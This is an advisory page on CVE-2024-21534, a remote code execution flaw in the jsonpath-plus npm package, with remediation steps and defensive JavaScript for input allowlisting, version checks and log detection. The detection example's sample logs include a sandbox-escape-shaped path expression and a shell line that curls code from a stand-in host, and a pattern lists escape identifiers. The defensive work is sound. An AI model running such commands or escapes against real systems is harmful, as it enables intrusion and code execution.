CVE-2024-21534
📋 TL;DR
CVE-2024-21534 is a critical Remote Code Execution vulnerability in the jsonpath-plus npm package. jsonpath-plus evaluates the script portion of JSONPath filter expressions (paths of the form $..book[?(@.price < 10)]) with Node's vm module, and the vm module is not a security boundary: a path expression that is not sanitized can escape the sandbox and run arbitrary code with the privileges of the Node.js process. Any Node.js application that passes attacker-influenced path expressions to jsonpath-plus, directly or through a dependency, is exposed; versions before the patched release listed below are affected.
💻 Affected Systems
- jsonpath-plus
⚠️ Manual Verification Required
This CVE entry does not carry machine-readable version ranges, so automatic vulnerability detection cannot determine from the CVE record alone whether your system is affected.
Why? The NVD entry provides no affected-version ranges. The vendor advisory and the patch version listed in the fix section below are the authoritative source, so check the installed version manually.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Complete system compromise allowing attacker to execute arbitrary commands, steal data, install malware, or pivot to other systems.
Likely Case
Application compromise leading to data theft, service disruption, or lateral movement within the environment.
If Mitigated
Limited impact if proper network segmentation, least privilege, and input validation are implemented.
🎯 Exploit Status
Exploitation details and payloads are publicly available in the project's GitHub issues. The initial fix was bypassed more than once: releases 10.0.0 through 10.1.0 were shown to be bypassable before the fix in 10.1.1, so a version anywhere in that range should be treated as vulnerable.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 10.1.1 and later (the fix was revised more than once; confirm the current patched version against the vendor advisory before relying on this number)
Vendor Advisory: https://github.com/JSONPath-Plus/JSONPath/security/advisories
Restart Required: Yes
Instructions:
1. Update jsonpath-plus to 10.1.1 or later. Note that npm update jsonpath-plus only moves within the range declared in package.json, so a dependency pinned to ^9.x will not cross the major version; run npm install jsonpath-plus@latest (or edit the range and reinstall) instead. If the package arrives as a transitive dependency, find the parent with npm ls jsonpath-plus --all and either update that parent or pin the version with an overrides entry in package.json.
2. Restart the Node.js application so the new code is loaded.
3. Test functionality to ensure compatibility; the fix changes how script expressions in paths are evaluated, so exercise any code path that uses ?() filters.
🔧 Temporary Workarounds
Input Validation and Sanitization
Implement strict input validation that rejects path expressions containing ?() filters or () script expressions before they reach jsonpath-plus, ideally by allowlisting only the plain member, index and wildcard syntax your application actually needs. If no code path needs script evaluation, also pass eval: false to JSONPath so that any expression that slips through throws instead of being evaluated.
Network Controls
Restrict network access to vulnerable applications and add WAF rules that block the script-expression markers ?( and [( in the parameters that carry JSONPath expressions. Treat this as a stopgap only, since encoding tricks can evade pattern matching.
🧯 If You Can't Patch
- Isolate vulnerable systems in segmented network zones with strict egress filtering
- Implement application-level allowlisting for JSON path expressions and monitor for exploitation attempts
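The allowlisting recommended in the workarounds above, as an added example (not code from the jsonpath-plus project or from this page's original author). It validates a JSONPath expression against a small grammar of member, index and wildcard segments, so that ?() filters and () script expressions never reach the evaluator, and wraps the query with eval: false as a second layer. The maximum length and the eval: false behaviour of the installed version are assumptions noted in the comments.

```javascript
// Added example (not jsonpath-plus project code). Allowlist validation of
// JSONPath expressions before they reach the evaluator, plus a wrapper that
// also disables script evaluation so that nothing reaches the vm module.

// Accepted syntax: a root "$" followed by zero or more of
//   .name / ..name     child member / recursive descent to a member
//   .* / ..*           wildcard member
//   [n] / [*]          numeric index / wildcard index, optionally after ".."
//   ['name']           bracketed member, single-quoted, no quotes or backslashes inside
// Everything else is rejected, in particular the ?(...) filters and (...) script
// expressions that jsonpath-plus hands to an evaluator.
const SEGMENT = String.raw`(?:\.\.?(?:[A-Za-z_][A-Za-z0-9_]*|\*)|(?:\.\.)?\[(?:\d+|\*|'[^'\\]*')\])`;
const SAFE_PATH = new RegExp('^\\$' + SEGMENT + '*$');
const MAX_PATH_LENGTH = 256; // assumption: no legitimate expression in this app is longer

function isSafeJsonPath(path) {
  if (typeof path !== 'string' || path.length === 0 || path.length > MAX_PATH_LENGTH) {
    return false;
  }
  return SAFE_PATH.test(path);
}

// Defence in depth: validate first, then query with eval disabled. With
// eval: false jsonpath-plus throws on script expressions instead of
// evaluating them (documented option; treated here as an assumption about
// the installed version). The require is deferred so the validator is usable
// on its own.
function safeQuery(json, path) {
  if (!isSafeJsonPath(path)) {
    throw new Error('rejected JSONPath expression: ' + JSON.stringify(path));
  }
  const { JSONPath } = require('jsonpath-plus');
  return JSONPath({ path, json, eval: false });
}
```

The grammar is deliberately narrower than what jsonpath-plus accepts (no double-quoted brackets, slices or unions); widen it only for syntax your application demonstrably uses, and keep the rejection before the library call so a future bypass of the library's own evaluator cannot reach it.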
🔍 How to Verify
Check if Vulnerable:
Check package.json or run npm ls jsonpath-plus --all to see every installed copy, including copies pulled in as transitive dependencies of other packages (searching package-lock.json for node_modules/jsonpath-plus entries covers the same ground). If any installed copy is below 10.1.1, the system is vulnerable.
Check Version:
npm ls jsonpath-plus --all | grep jsonpath-plus
Verify Fix Applied:
Confirm that every copy reported by npm ls jsonpath-plus --all is 10.1.1 or higher, check that npm audit no longer reports the advisory, and test application functionality.
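The version check above, as an added example that is not part of the original page or the project's tooling. It parses the JSON that npm ls jsonpath-plus --all --json prints, walks the nested dependency tree so transitive copies are not missed, and compares each version numerically against the patch version this page names (a plain string comparison would rank 9.x above 10.x). The sample tree is constructed, not captured from a real project.

```javascript
// Added example, not the project's own tooling. Decide whether the installed
// copies of jsonpath-plus are below the patched release named on this page
// by parsing the JSON printed by: npm ls jsonpath-plus --all --json

const PACKAGE = 'jsonpath-plus';
// Taken from the fix section of this page; confirm against the vendor advisory.
const PATCHED_VERSION = '10.1.1';

function parseSemver(version) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)/.exec(version);
  if (!m) throw new Error('not a semver version: ' + version);
  return [Number(m[1]), Number(m[2]), Number(m[3])];
}

// Numeric comparison of major.minor.patch; string comparison gets 9.x > 10.x wrong.
function compareSemver(a, b) {
  const pa = parseSemver(a);
  const pb = parseSemver(b);
  for (let i = 0; i < 3; i++) {
    if (pa[i] !== pb[i]) return pa[i] < pb[i] ? -1 : 1;
  }
  return 0;
}

function isVulnerableVersion(version) {
  return compareSemver(version, PATCHED_VERSION) < 0;
}

// Walk the nested "dependencies" tree from npm ls --json and record every
// place the package appears; transitive copies are easy to miss otherwise.
function findInstalled(tree, chain = [], out = []) {
  for (const [name, info] of Object.entries(tree.dependencies || {})) {
    const here = chain.concat(name);
    if (name === PACKAGE && typeof info.version === 'string') {
      out.push({ chain: here.join(' > '), version: info.version });
    }
    findInstalled(info, here, out);
  }
  return out;
}

function report(npmLsJson) {
  return findInstalled(npmLsJson).map((hit) => ({
    ...hit,
    vulnerable: isVulnerableVersion(hit.version),
  }));
}

// Constructed sample of npm ls output (not captured from a real project):
// one direct copy that is still vulnerable and one patched copy nested under
// a dependency.
const SAMPLE_NPM_LS = {
  name: 'example-app',
  version: '1.0.0',
  dependencies: {
    'jsonpath-plus': { version: '9.0.0' },
    'some-sdk': {
      version: '2.3.4',
      dependencies: { 'jsonpath-plus': { version: '10.1.1' } },
    },
  },
};

// Usage: node check-jsonpath-plus.js tree.json  (after npm ls jsonpath-plus --all --json > tree.json)
// With no .json argument the constructed sample is used.
const treeFile = process.argv[2] && process.argv[2].endsWith('.json') ? process.argv[2] : null;
const input = treeFile
  ? JSON.parse(require('node:fs').readFileSync(treeFile, 'utf8'))
  : SAMPLE_NPM_LS;
for (const hit of report(input)) {
  console.log((hit.vulnerable ? 'VULNERABLE ' : 'ok         ') + hit.version + '  ' + hit.chain);
}
```

On the sample tree the direct 9.0.0 copy is reported as vulnerable and the nested 10.1.1 copy as fixed; in a real project every chain reported as vulnerable needs its own remediation, because updating the top-level dependency does not touch a copy nested under another package.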
📡 Detection & Monitoring
Log Indicators:
- Unusual process spawns from Node.js applications
- Error logs containing vm module exceptions
- Unexpected outbound network connections from application servers
Network Indicators:
- HTTP requests with unusual JSON path parameters
- Traffic patterns indicating command execution, such as outbound connections or DNS lookups from the application host to unfamiliar destinations shortly after a request carrying a JSONPath expression
SIEM Query:
source="application.logs" AND ("jsonpath-plus" OR "vm") AND ("error" OR "exception")
This illustrative Splunk-style query is noisy: the bare term "vm" matches far more than the Node vm module. A tighter search keys on the request parameter that carries the JSONPath expression and looks for the script-expression marker "?(" together with identifiers such as "constructor", "process" or "require", and separately alerts on any child process spawned by the Node.js service.
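The log and network indicators above, turned into detection logic as an added example (not from the original page or the jsonpath-plus project). It scans constructed sample log lines for JSONPath parameters that contain script expressions or identifiers typical of Node vm sandbox escapes, for evaluator errors, and for child processes spawned by the Node service. The parameter name "path", the log layout and the process-audit field names are assumptions about the monitored application; map them to your own schema.

```javascript
// Added example, not from the original page or the jsonpath-plus project.
// Detection logic for the indicators above, run over constructed sample
// log lines (not captured from a real system). Field names are generic; map
// them to your own web-server and process-audit schema.

// Script-expression markers: ?( filters, [( script expressions, and the @
// current-node reference that only makes sense inside one of them.
const SCRIPT_EXPRESSION = /\?\(|\[\(|@/;
// Identifiers typical of Node vm sandbox escapes; a legitimate data path
// rarely needs any of them.
const ESCAPE_IDIOM = /\b(constructor|__proto__|prototype|process|require|child_process|mainModule|Function|eval)\b/;

// Pull the JSONPath expression out of an access-log line; the parameter name
// "path" is an assumption about the application.
function extractJsonPathParam(line, param = 'path') {
  const m = new RegExp('[?&]' + param + '=([^ &]+)').exec(line);
  if (!m) return null;
  try {
    return decodeURIComponent(m[1]);
  } catch {
    return m[1]; // malformed percent-encoding: inspect the raw value instead
  }
}

function classifyLine(line) {
  const findings = [];
  const path = extractJsonPathParam(line);
  if (path !== null) {
    if (ESCAPE_IDIOM.test(path)) {
      findings.push('jsonpath-escape-idiom');      // high: shaped like a sandbox escape
    } else if (SCRIPT_EXPRESSION.test(path)) {
      findings.push('jsonpath-script-expression'); // medium: does the app need filters at all?
    }
  }
  // Error-log indicator from the page; noisy, tune to your app's real error text.
  if (/\bERROR\b/.test(line) && /\bvm\b/i.test(line)) {
    findings.push('vm-error');
  }
  // Process-spawn indicator: a child process whose parent is the Node service
  // (constructed field names; adapt to auditd or Sysmon parent/child fields).
  if (/\bparent_comm=node\b/.test(line) && /\bexec=/.test(line)) {
    findings.push('node-process-spawn');
  }
  return findings;
}

function scan(lines) {
  return lines.flatMap((line, i) =>
    classifyLine(line).map((finding) => ({ line: i + 1, finding })));
}

// Constructed sample: one benign query, one filter expression, one
// escape-shaped expression, one evaluator error, one child process.
const SAMPLE_LOGS = [
  '2024-10-12T10:00:01Z web GET /api/items?path=%24.store.book%5B0%5D.title 200',
  '2024-10-12T10:00:02Z web GET /api/items?path=%24..book%5B%3F(%40.price%3C10)%5D 200',
  '2024-10-12T10:00:03Z web GET /api/items?path=%24%5B%3F(%40.constructor.constructor)%5D 500',
  '2024-10-12T10:00:03Z app ERROR JSONPath evaluation failed: vm script threw',
  '2024-10-12T10:00:04Z host proc-audit parent_comm=node pid=4242 exec=/bin/sh args="-c curl http://198.51.100.7/x"',
];

for (const hit of scan(SAMPLE_LOGS)) {
  console.log('line ' + hit.line + ': ' + hit.finding);
}
```

Decode the parameter before matching, as the example does, or percent-encoded payloads slip past the patterns; and treat a script-expression finding followed within seconds by a process spawn from the same host as a single high-severity event rather than two low ones.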